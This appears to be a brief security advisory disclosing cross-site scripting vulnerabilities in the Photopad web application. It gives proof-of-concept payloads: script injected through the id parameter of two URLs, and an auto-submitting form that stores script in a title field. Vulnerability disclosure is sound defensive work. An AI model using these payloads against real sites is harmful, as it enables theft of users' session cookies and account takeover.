High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Photopad which could be exploited to perform cross-site scripting attacks.
http://host/files.php?action=edit&id=999"><script>alert(document.cookie)</sc ript>
2.
http://host/gallery.php?action=view&id=999"><script>alert(document.cookie)</ script>
3.
<form action=“http://host/files.php?action=edit&id=2” method=“post” name=“main”>
<input type=“hidden” name=“data[title]” value=‘title"><script>alert(document.cookie)</script>’>
<input type=“hidden” name=“data[tags]” value=‘tag’>
</form>
<script>
document.main.submit();
</script>